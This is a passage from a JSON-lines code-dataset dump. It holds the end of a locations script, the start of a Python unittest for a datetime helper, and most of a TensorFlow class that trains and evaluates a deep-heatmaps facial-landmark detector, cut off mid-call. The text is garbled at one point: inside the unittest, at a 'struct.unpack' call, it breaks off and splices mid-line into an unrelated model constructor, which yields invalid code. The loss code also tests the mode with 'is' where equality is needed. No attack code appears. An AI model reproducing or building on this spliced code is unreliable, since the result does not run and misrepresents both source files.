'w') as file:\n file.write(json_data)\n\n\nif __name__ == '__main__':\n get_info()\n","repo_name":"droslik/locations","sub_path":"async_sucusales.py","file_name":"async_sucusales.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36592165805","text":"import sys\nsys.path.append(\"..\")\nimport struct\nimport unittest\nfrom libljlt import Helpers\n\n\nclass DateTimeFunctionTests(unittest.TestCase):\n def test_to_string(self):\n raw_timestamp = b\"\\xBF\\x8B\\x9A\\x52\\x96\\xCE\\xCE\\x01\"\n u64_int = struct.unpack(\" 0.), p_texture=p_texture,\n augment_geom=(augment_geom and artistic_start == 0 and p_geom > 0.), p_geom=p_geom,\n verbose=menpo_verbose)\n\n if mode == 'TRAIN':\n\n train_params = locals()\n print_training_params_to_file(train_params) # save init parameters\n\n self.train_inds = np.arange(len(self.img_menpo_list))\n\n if self.debug:\n self.train_inds = self.train_inds[:self.debug_data_size]\n self.img_menpo_list = self.img_menpo_list[self.train_inds]\n\n if valid_size > 0:\n\n self.valid_bb_dictionary = load_bb_dictionary(self.bb_dir, 'TEST', test_data=self.valid_data)\n self.valid_img_menpo_list = load_menpo_image_list(\n img_path, train_crop_dir, self.img_dir_ns, 'TEST', bb_dictionary=self.valid_bb_dictionary,\n image_size=self.image_size, margin=margin, bb_type=bb_type, test_data=self.valid_data,\n verbose=menpo_verbose)\n\n np.random.seed(0)\n self.val_inds = np.arange(len(self.valid_img_menpo_list))\n np.random.shuffle(self.val_inds)\n self.val_inds = self.val_inds[:self.valid_size]\n\n self.valid_img_menpo_list = self.valid_img_menpo_list[self.val_inds]\n\n if self.approx_maps_cpu:\n self.valid_images_loaded, self.valid_gt_maps_loaded, self.valid_landmarks_loaded =\\\n load_images_landmarks_approx_maps(\n self.valid_img_menpo_list, np.arange(self.valid_size), primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, c_dim=self.c_dim, scale=self.scale, win_mult=self.win_mult,\n sigma=self.sigma, save_landmarks=True)\n else:\n self.valid_images_loaded, self.valid_gt_maps_loaded, self.valid_landmarks_loaded =\\\n load_images_landmarks_maps(\n self.valid_img_menpo_list, np.arange(self.valid_size), primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=True)\n\n if self.allocate_once:\n self.valid_landmarks_pred = np.zeros([self.valid_size, self.num_landmarks, 2]).astype('float32')\n\n if self.valid_size > self.sample_grid:\n self.valid_gt_maps_loaded = self.valid_gt_maps_loaded[:self.sample_grid]\n else:\n self.val_inds = None\n\n self.epoch_inds_shuffle = train_val_shuffle_inds_per_epoch(\n self.val_inds, self.train_inds, train_iter, batch_size, save_log_path)\n\n def add_placeholders(self):\n\n if self.mode == 'TEST':\n self.images = tf.placeholder(\n tf.float32, [None, self.image_size, self.image_size, self.c_dim], 'images')\n\n self.heatmaps_small = tf.placeholder(\n tf.float32, [None, int(self.image_size/4), int(self.image_size/4), self.num_landmarks], 'heatmaps_small')\n self.lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'lms_small')\n self.pred_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'pred_lms_small')\n\n elif self.mode == 'TRAIN':\n self.images = tf.placeholder(\n tf.float32, [None, self.image_size, self.image_size, self.c_dim], 'train_images')\n\n self.heatmaps_small = tf.placeholder(\n tf.float32, [None, int(self.image_size/4), int(self.image_size/4), self.num_landmarks], 'train_heatmaps_small')\n\n self.train_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'train_lms_small')\n self.train_pred_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'train_pred_lms_small')\n\n self.valid_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'valid_lms_small')\n self.valid_pred_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'valid_pred_lms_small')\n\n self.p_texture_log = tf.placeholder(tf.float32, [])\n self.p_geom_log = tf.placeholder(tf.float32, [])\n\n self.sparse_hm_small = tf.placeholder(tf.float32, [None, int(self.image_size/4), int(self.image_size/4), 1])\n\n if self.sample_to_log:\n row = int(np.sqrt(self.sample_grid))\n self.log_image_map = tf.placeholder(\n tf.uint8, [None,row * int(self.image_size/4), 3 * row *int(self.image_size/4), self.c_dim], 'sample_img_map')\n if self.sample_per_channel:\n row = np.ceil(np.sqrt(self.num_landmarks)).astype(np.int64)\n self.log_map_channels = tf.placeholder(\n tf.uint8, [None, row * int(self.image_size/4), 2 * row * int(self.image_size/4), self.c_dim],\n 'sample_map_channels')\n\n def heatmaps_network(self, input_images, reuse=None, name='pred_heatmaps'):\n\n with tf.name_scope(name):\n\n if self.weight_initializer == 'xavier':\n weight_initializer = contrib.layers.xavier_initializer()\n else:\n weight_initializer = tf.random_normal_initializer(stddev=self.weight_initializer_std)\n\n bias_init = tf.constant_initializer(self.bias_initializer)\n\n with tf.variable_scope('heatmaps_network'):\n with tf.name_scope('primary_net'):\n\n l1 = conv_relu_pool(input_images, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_1')\n l2 = conv_relu_pool(l1, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_2')\n l3 = conv_relu(l2, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_3')\n\n l4_1 = conv_relu(l3, 3, 128, conv_dilation=1, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_1')\n l4_2 = conv_relu(l3, 3, 128, conv_dilation=2, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_2')\n l4_3 = conv_relu(l3, 3, 128, conv_dilation=3, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_3')\n l4_4 = conv_relu(l3, 3, 128, conv_dilation=4, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_4')\n\n l4 = tf.concat([l4_1, l4_2, l4_3, l4_4], 3, name='conv_4')\n\n l5_1 = conv_relu(l4, 3, 256, conv_dilation=1, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_1')\n l5_2 = conv_relu(l4, 3, 256, conv_dilation=2, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_2')\n l5_3 = conv_relu(l4, 3, 256, conv_dilation=3, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_3')\n l5_4 = conv_relu(l4, 3, 256, conv_dilation=4, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_4')\n\n l5 = tf.concat([l5_1, l5_2, l5_3, l5_4], 3, name='conv_5')\n\n l6 = conv_relu(l5, 1, 512, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_6')\n l7 = conv_relu(l6, 1, 256, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_7')\n primary_out = conv(l7, 1, self.num_landmarks, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_8')\n\n self.all_layers = [l1, l2, l3, l4, l5, l6, l7, primary_out]\n\n return primary_out\n\n def build_model(self):\n self.pred_hm_p = self.heatmaps_network(self.images,name='heatmaps_prediction')\n\n def build_hm_generator(self): # TODO: remove\n # generate heat-maps using:\n # a sparse base (matrix of zeros with 1's in landmark locations) and convolving with a gaussian filter\n print (\"*** using convolution to create heat-maps. use this option only with GPU support ***\")\n\n # create gaussian filter\n win_small = int(self.win_mult * self.sigma)\n x_small, y_small = np.mgrid[0:2*win_small+1, 0:2*win_small+1]\n\n gauss_small = (8. / 3) * self.sigma * gaussian(x_small, y_small, win_small, win_small, sigma=self.sigma)\n gauss_small = tf.constant(gauss_small, tf.float32)\n gauss_small = tf.reshape(gauss_small, [2 * win_small + 1, 2 * win_small + 1, 1, 1])\n\n # convolve sparse map with gaussian\n self.filt_hm_small = tf.nn.conv2d(self.sparse_hm_small, gauss_small, strides=[1, 1, 1, 1], padding='SAME')\n self.filt_hm_small = tf.transpose(\n tf.concat(tf.split(self.filt_hm_small, self.batch_size, axis=0), 3), [3, 1, 2, 0])\n\n def create_loss_ops(self): # TODO: calculate NME on resized maps to 256\n\n def l2_loss_norm_eyes(pred_landmarks, real_landmarks, normalize=True, name='NME'):\n\n with tf.name_scope(name):\n with tf.name_scope('real_pred_landmarks_rmse'):\n landmarks_rms_err = tf.reduce_mean(\n tf.sqrt(tf.reduce_sum(tf.square(pred_landmarks - real_landmarks), axis=2)), axis=1)\n if normalize:\n with tf.name_scope('inter_pupil_dist'):\n with tf.name_scope('left_eye_center'):\n p1 = tf.reduce_mean(tf.slice(real_landmarks, [0, 42, 0], [-1, 6, 2]), axis=1)\n with tf.name_scope('right_eye_center'):\n p2 = tf.reduce_mean(tf.slice(real_landmarks, [0, 36, 0], [-1, 6, 2]), axis=1)\n\n eye_dist = tf.sqrt(tf.reduce_sum(tf.square(p1 - p2), axis=1))\n\n return landmarks_rms_err / eye_dist\n else:\n return landmarks_rms_err\n\n if self.mode is 'TRAIN':\n primary_maps_diff = self.pred_hm_p-self.heatmaps_small\n self.total_loss = 1000.*tf.reduce_mean(tf.square(primary_maps_diff))\n\n # add weight decay\n self.total_loss += self.reg * tf.add_n(\n [tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name])\n\n if self.compute_nme:\n self.nme_loss = tf.reduce_mean(l2_loss_norm_eyes(self.train_pred_lms_small,self.train_lms_small))\n\n if self.valid_size > 0 and self.compute_nme:\n self.valid_nme_loss = tf.reduce_mean(l2_loss_norm_eyes(self.valid_pred_lms_small,self.valid_lms_small))\n\n elif self.mode == 'TEST' and self.compute_nme:\n self.nme_per_image = l2_loss_norm_eyes(self.pred_lms_small, self.lms_small)\n self.nme_loss = tf.reduce_mean(self.nme_per_image)\n\n def predict_landmarks_in_batches(self, image_paths, session):\n\n num_batches = int(1.*len(image_paths)/self.batch_size)\n if num_batches == 0:\n batch_size = len(image_paths)\n num_batches = 1\n else:\n batch_size = self.batch_size\n\n img_inds = np.arange(len(image_paths))\n for j in range(num_batches):\n batch_inds = img_inds[j * batch_size:(j + 1) * batch_size]\n\n batch_images, _, batch_lms_small = \\\n load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n if j == 0:\n all_pred_landmarks = batch_pred_landmarks.copy()\n all_gt_landmarks = batch_lms_small.copy()\n else:\n all_pred_landmarks = np.concatenate((all_pred_landmarks,batch_pred_landmarks),0)\n all_gt_landmarks = np.concatenate((all_gt_landmarks, batch_lms_small), 0)\n\n reminder = len(image_paths)-num_batches*batch_size\n\n if reminder > 0:\n reminder_inds = img_inds[-reminder:]\n\n batch_images, _, batch_lms_small = \\\n load_images_landmarks_maps(\n self.img_menpo_list, reminder_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=reminder, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n all_gt_landmarks = np.concatenate((all_gt_landmarks, batch_lms_small), 0)\n\n return all_pred_landmarks, all_gt_landmarks\n\n def predict_landmarks_in_batches_loaded(self, images, session):\n\n num_images = int(images.shape[0])\n num_batches = int(1.*num_images/self.batch_size)\n if num_batches == 0:\n batch_size = num_images\n num_batches = 1\n else:\n batch_size = self.batch_size\n\n for j in range(num_batches):\n\n batch_images = images[j * batch_size:(j + 1) * batch_size,:,:,:]\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred,\n batch_landmarks=self.valid_landmarks_pred[j * batch_size:(j + 1) * batch_size, :, :],\n batch_size=batch_size, image_size=int(self.image_size/4), num_landmarks=self.num_landmarks)\n else:\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n if j == 0:\n all_pred_landmarks = batch_pred_landmarks.copy()\n else:\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n\n reminder = num_images-num_batches*batch_size\n if reminder > 0:\n\n batch_images = images[-reminder:, :, :, :]\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred,\n batch_landmarks=self.valid_landmarks_pred[-reminder:, :, :],\n batch_size=reminder, image_size=int(self.image_size/4), num_landmarks=self.num_landmarks)\n else:\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=reminder, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n\n if not self.allocate_once:\n return all_pred_landmarks\n\n def create_summary_ops(self):\n\n self.batch_summary_op = tf.summary.scalar('l_total', self.total_loss)\n\n if self.compute_nme:\n l_nme = tf.summary.scalar('l_nme', self.nme_loss)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, l_nme])\n\n if self.log_histograms:\n var_summary = [tf.summary.histogram(var.name, var) for var in tf.trainable_variables()]\n grads = tf.gradients(self.total_loss, tf.trainable_variables())\n grads = list(zip(grads, tf.trainable_variables()))\n grad_summary = [tf.summary.histogram(var.name + '/grads', grad) for grad, var in grads]\n activ_summary = [tf.summary.histogram(layer.name, layer) for layer in self.all_layers]\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, var_summary, grad_summary, activ_summary])\n\n if self.augment_texture and self.log_artistic_augmentation_probs:\n p_texture_summary = tf.summary.scalar('p_texture', self.p_texture_log)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, p_texture_summary])\n\n if self.augment_geom and self.log_artistic_augmentation_probs:\n p_geom_summary = tf.summary.scalar('p_geom', self.p_geom_log)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, p_geom_summary])\n\n if self.valid_size > 0 and self.compute_nme:\n self.valid_summary = tf.summary.scalar('valid_l_nme', self.valid_nme_loss)\n\n if self.sample_to_log:\n img_map_summary =tf.summary.image('compare_map_to_gt',self.log_image_map)\n if self.sample_per_channel:\n map_channels_summary = tf.summary.image('compare_map_channels_to_gt', self.log_map_channels)\n self.img_summary = tf.summary.merge([img_map_summary, map_channels_summary])\n else:\n self.img_summary = img_map_summary\n if self.valid_size >= self.sample_grid:\n img_map_summary_valid = tf.summary.image('compare_map_to_gt_valid', self.log_image_map)\n if self.sample_per_channel:\n map_channels_summary_valid = tf.summary.image('compare_map_channels_to_gt_valid', self.log_map_channels)\n self.img_summary_valid = tf.summary.merge([img_map_summary_valid, map_channels_summary_valid])\n else:\n self.img_summary_valid = img_map_summary_valid\n\n def eval(self):\n\n self.add_placeholders()\n # build model\n self.build_model()\n self.create_loss_ops()\n\n if self.debug:\n self.img_menpo_list = self.img_menpo_list[:np.min([self.debug_data_size, len(self.img_menpo_list)])]\n\n num_images = len(self.img_menpo_list)\n img_inds = np.arange(num_images)\n\n sample_iter = np.ceil(1. * num_images / self.sample_grid).astype('int')\n\n with tf.Session(config=self.config) as sess:\n\n # load trained parameters\n print ('loading test model...')\n saver = tf.train.Saver()\n saver.restore(sess, self.test_model_path)\n\n _, model_name = os.path.split(self.test_model_path)\n\n gt_provided = self.img_menpo_list[0].has_landmarks # check if GT landmarks provided\n\n for i in range(sample_iter):\n\n batch_inds = img_inds[i * self.sample_grid:(i + 1) * self.sample_grid]\n\n if not gt_provided:\n batch_images = load_images(self.img_menpo_list, batch_inds, image_size=self.image_size,\n c_dim=self.c_dim, scale=self.scale)\n\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n\n batch_maps_gt = None\n else:\n # TODO: add option for approx maps + allocate once\n batch_images, batch_maps_gt, _ = \\\n load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=False)\n\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n\n sample_path_imgs = os.path.join(\n self.save_sample_path, model_name +'-'+ self.test_data+'-sample-%d-to-%d-1.png' % (\n i * self.sample_grid, (i + 1) * self.sample_grid))\n\n merged_img = merge_images_landmarks_maps_gt(\n batch_images.copy(), batch_maps_small_pred, batch_maps_gt, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid, scale=self.scale, circle_size=0,\n fast=self.fast_img_gen)\n\n scipy.misc.imsave(sample_path_imgs, merged_img)\n\n if self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n batch_images.copy(), batch_maps_small_pred,batch_maps_gt, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n sample_path_channels = os.path.join(\n self.save_sample_path, model_name + '-' + self.test_data + '-sample-%d-to-%d-3.png' % (\n i * self.sample_grid, (i + 1) * self.sample_grid))\n\n scipy.misc.imsave(sample_path_channels, map_per_channel)\n\n print ('saved %s' % sample_path_imgs)\n\n if self.compute_nme and self.test_data in ['full', 'challenging', 'common', 'training', 'test']:\n print ('\\n Calculating NME on: ' + self.test_data + '...')\n pred_lms, lms_gt = self.predict_landmarks_in_batches(self.img_menpo_list, sess)\n nme = sess.run(self.nme_loss, {self.pred_lms_small: pred_lms, self.lms_small: lms_gt})\n print ('NME on ' + self.test_data + ': ' + str(nme))\n\n def train(self):\n # set random seed\n tf.set_random_seed(1234)\n np.random.seed(1234)\n # build a graph\n # add placeholders\n self.add_placeholders()\n # build model\n self.build_model()\n # create loss ops\n self.create_loss_ops()\n # create summary ops\n self.create_summary_ops()\n\n # create optimizer and training op\n global_step = tf.Variable(0, trainable=False)\n lr = tf.train.exponential_decay(self.learning_rate,global_step, self.step, self.gamma, staircase=True)\n if self.adam_optimizer:\n optimizer = tf.train.AdamOptimizer(lr)\n else:\n optimizer = tf.train.MomentumOptimizer(lr, self.momentum)\n\n train_op = optimizer.minimize(self.total_loss,global_step=global_step)\n\n # TODO: remove\n if self.approx_maps_gpu: # create heat-maps using tf convolution. use only with GPU support!\n self.build_hm_generator()\n\n with tf.Session(config=self.config) as sess:\n\n tf.global_variables_initializer().run()\n\n # load pre trained weights if load_pretrain==True\n if self.load_pretrain:\n print\n print('*** loading pre-trained weights from: '+self.pre_train_path+' ***')\n loader = tf.train.Saver()\n loader.restore(sess, self.pre_train_path)\n print(\"*** Model restore finished, current global step: %d\" % global_step.eval())\n\n # for fine-tuning, choose reset_training_op==True. when resuming training, reset_training_op==False\n if self.reset_training_op:\n print (\"resetting optimizer and global step\")\n opt_var_list = [optimizer.get_slot(var, name) for name in optimizer.get_slot_names()\n for var in tf.global_variables() if optimizer.get_slot(var, name) is not None]\n opt_var_list_init = tf.variables_initializer(opt_var_list)\n opt_var_list_init.run()\n sess.run(global_step.initializer)\n\n # create model saver and file writer\n summary_writer = tf.summary.FileWriter(logdir=self.save_log_path, graph=tf.get_default_graph())\n saver = tf.train.Saver()\n\n print\n print('*** Start Training ***')\n\n # initialize some variables before training loop\n resume_step = global_step.eval()\n num_train_images = len(self.img_menpo_list)\n batches_in_epoch = int(float(num_train_images) / float(self.batch_size))\n epoch = int(resume_step / batches_in_epoch)\n img_inds = self.epoch_inds_shuffle[epoch, :]\n p_texture = self.p_texture\n p_geom = self.p_geom\n artistic_reload = False\n basic_reload = True\n log_valid = True\n log_valid_images = True\n\n if self.allocate_once:\n batch_images = np.zeros([self.batch_size, self.image_size, self.image_size, self.c_dim]).astype('float32')\n batch_lms_small = np.zeros([self.batch_size, self.num_landmarks, 2]).astype('float32')\n batch_lms_small_pred = np.zeros([self.batch_size, self.num_landmarks, 2]).astype('float32')\n if self.approx_maps_gpu:\n batch_hm_base_small = np.zeros((self.batch_size * self.num_landmarks,\n int(self.image_size/4), int(self.image_size/4), 1)).astype('float32')\n else:\n batch_maps_small = np.zeros((self.batch_size, int(self.image_size/4),\n int(self.image_size/4), self.num_landmarks)).astype('float32')\n\n if self.approx_maps_cpu:\n gaussian_filt = create_gaussian_filter(sigma=self.sigma, win_mult=self.win_mult)\n\n for step in range(resume_step, self.train_iter):\n\n j = step % batches_in_epoch # j==0 if we finished an epoch\n\n if step > resume_step and j == 0: # if we finished an epoch and this isn't the first step\n epoch += 1\n img_inds = self.epoch_inds_shuffle[epoch, :] # get next shuffled image inds\n artistic_reload = True\n log_valid = True\n log_valid_images = True\n if self.use_epoch_data:\n epoch_dir = os.path.join(self.epoch_data_dir, str(epoch))\n self.img_menpo_list = load_menpo_image_list(\n self.img_path, train_crop_dir=epoch_dir, img_dir_ns=None, mode=self.mode,\n bb_dictionary=self.bb_dictionary, image_size=self.image_size, test_data=self.test_data,\n augment_basic=False, augment_texture=False, augment_geom=False)\n\n # add basic augmentation (if basic_start > 0 and augment_basic is True)\n if basic_reload and (epoch >= self.basic_start) and self.basic_start > 0 and self.augment_basic:\n basic_reload = False\n self.img_menpo_list = reload_menpo_image_list(\n self.img_path, self.train_crop_dir, self.img_dir_ns, self.mode, self.train_inds,\n image_size=self.image_size, augment_basic=self.augment_basic,\n augment_texture=(self.augment_texture and epoch >= self.artistic_start), p_texture=p_texture,\n augment_geom=(self.augment_geom and epoch >= self.artistic_start), p_geom=p_geom)\n print (\"****** adding basic augmentation ******\")\n\n # increase artistic augmentation probability\n if ((epoch % self.artistic_step == 0 and epoch >= self.artistic_start and self.artistic_step != -1)\n or (epoch == self.artistic_start)) and (self.augment_geom or self.augment_texture)\\\n and artistic_reload:\n\n artistic_reload = False\n\n if epoch == self.artistic_start:\n print (\"****** adding artistic augmentation ******\")\n print (\"****** augment_geom: \" + str(self.augment_geom) + \", p_geom: \" + str(p_geom) + \" ******\")\n print (\"****** augment_texture: \" + str(self.augment_texture) + \", p_texture: \" +\n str(p_texture) + \" ******\")\n\n if epoch % self.artistic_step == 0 and self.artistic_step != -1:\n print (\"****** increasing artistic augmentation probability ******\")\n\n p_geom = 1.- 0.95 ** (epoch/self.artistic_step)\n p_texture = 1. - 0.95 ** (epoch/self.artistic_step)\n\n print (\"****** augment_geom: \" + str(self.augment_geom) + \", p_geom: \" + str(p_geom) + \" ******\")\n print (\"****** augment_texture: \" + str(self.augment_texture) + \", p_texture: \" +\n str(p_texture) + \" ******\")\n\n self.img_menpo_list = reload_menpo_image_list(\n self.img_path, self.train_crop_dir, self.img_dir_ns, self.mode, self.train_inds,\n image_size=self.image_size, augment_basic=(self.augment_basic and epoch >= self.basic_start),\n augment_texture=self.augment_texture, p_texture=p_texture,\n augment_geom=self.augment_geom, p_geom=p_geom)\n\n # get batch images\n batch_inds = img_inds[j * self.batch_size:(j + 1) * self.batch_size]\n\n if self.approx_maps_gpu: # TODO: remove\n if self.allocate_once:\n load_images_landmarks_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, landmarks_small=batch_lms_small,\n landmarks=None, primary=True, image_size=self.image_size, scale=self.scale)\n\n create_heat_maps_base_alloc_once(\n landmarks_small=batch_lms_small.astype(int), landmarks=None,\n hm_small=batch_hm_base_small, hm_large=None, primary=True, num_images=self.batch_size,\n num_landmarks=self.num_landmarks)\n else:\n batch_images, batch_lms_small = load_images_landmarks(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size, c_dim=self.c_dim,\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n batch_hm_base_small = create_heat_maps_base(\n landmarks_small=batch_lms_small.astype(int), landmarks=None, primary=True,\n num_images=self.batch_size, image_size=self.image_size, num_landmarks=self.num_landmarks)\n\n batch_maps_small = sess.run(self.filt_hm_small, {self.sparse_hm_small: batch_hm_base_small})\n elif self.approx_maps_cpu:\n if self.allocate_once:\n load_images_landmarks_approx_maps_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, maps_small=batch_maps_small,\n maps=None, landmarks=batch_lms_small, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, scale=self.scale, gauss_filt_small=gaussian_filt,\n win_mult=self.win_mult, sigma=self.sigma, save_landmarks=self.compute_nme)\n else:\n batch_images, batch_maps_small, batch_lms_small = load_images_landmarks_approx_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, c_dim=self.c_dim, scale=self.scale,\n gauss_filt_small=gaussian_filt, win_mult=self.win_mult, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n else:\n if self.allocate_once:\n load_images_landmarks_maps_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, maps_small=batch_maps_small,\n landmarks=batch_lms_small, maps=None, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n else:\n batch_images, batch_maps_small, batch_lms_small = load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size, c_dim=self.c_dim,\n num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n feed_dict_train = {self.images: batch_images, self.heatmaps_small: batch_maps_small}\n\n sess.run(train_op, feed_dict_train)\n\n # save to log and print status\n if step == resume_step or (step + 1) % self.print_every == 0:\n\n # log probability of artistic augmentation\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n if self.augment_geom and not self.augment_texture:\n art_augment_prob_dict = {self.p_geom_log: p_geom}\n elif self.augment_texture and not self.augment_geom:\n art_augment_prob_dict = {self.p_texture_log: p_texture}\n else:\n art_augment_prob_dict = {self.p_texture_log: p_texture, self.p_geom_log: p_geom}\n\n # train data log\n if self.compute_nme:\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred, batch_landmarks=batch_lms_small_pred,\n batch_size=self.batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n else:\n batch_lms_small_pred = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, self.batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n train_feed_dict_log = {\n self.images: batch_images, self.heatmaps_small: batch_maps_small,\n self.train_lms_small: batch_lms_small, self.train_pred_lms_small: batch_lms_small_pred}\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n train_feed_dict_log.update(art_augment_prob_dict)\n\n summary, l_t, l_nme = sess.run(\n [self.batch_summary_op, self.total_loss, self.nme_loss], train_feed_dict_log)\n\n print (\n 'epoch: [%d] step: [%d/%d] primary loss: [%.6f] NME: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_t, l_nme))\n else:\n train_feed_dict_log = {self.images: batch_images, self.heatmaps_small: batch_maps_small}\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n train_feed_dict_log.update(art_augment_prob_dict)\n\n summary, l_t = sess.run(\n [self.batch_summary_op, self.total_loss], train_feed_dict_log)\n\n print (\n 'epoch: [%d] step: [%d/%d] primary loss: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_t))\n\n summary_writer.add_summary(summary, step)\n\n # valid data log\n if self.valid_size > 0 and (log_valid and epoch % self.log_valid_every == 0)\\\n and self.compute_nme:\n log_valid = False\n\n if self.allocate_once:\n self.predict_landmarks_in_batches_loaded(self.valid_images_loaded, sess)\n valid_feed_dict_log = {\n self.valid_lms_small: self.valid_landmarks_loaded,\n self.valid_pred_lms_small: self.valid_landmarks_pred}\n else:\n valid_pred_lms = self.predict_landmarks_in_batches_loaded(self.valid_images_loaded, sess)\n valid_feed_dict_log = {\n self.valid_lms_small: self.valid_landmarks_loaded,\n self.valid_pred_lms_small: valid_pred_lms}\n\n v_summary,l_v_nme = sess.run([self.valid_summary, self.valid_nme_loss], valid_feed_dict_log)\n summary_writer.add_summary(v_summary, step)\n\n print (\n 'epoch: [%d] step: [%d/%d] valid NME: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_v_nme))\n\n # save model\n if (step + 1) % self.save_every == 0:\n saver.save(sess, os.path.join(self.save_model_path, 'deep_heatmaps'), global_step=step + 1)\n print ('model/deep-heatmaps-%d saved' % (step + 1))\n\n # save images. TODO: add option to allocate once\n if step == resume_step or (step + 1) % self.sample_every == 0:\n\n if not self.compute_nme:\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n batch_lms_small_pred=None\n\n merged_img = merge_images_landmarks_maps_gt(\n batch_images.copy(), batch_maps_small_pred, batch_maps_small,\n landmarks=batch_lms_small_pred, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid, 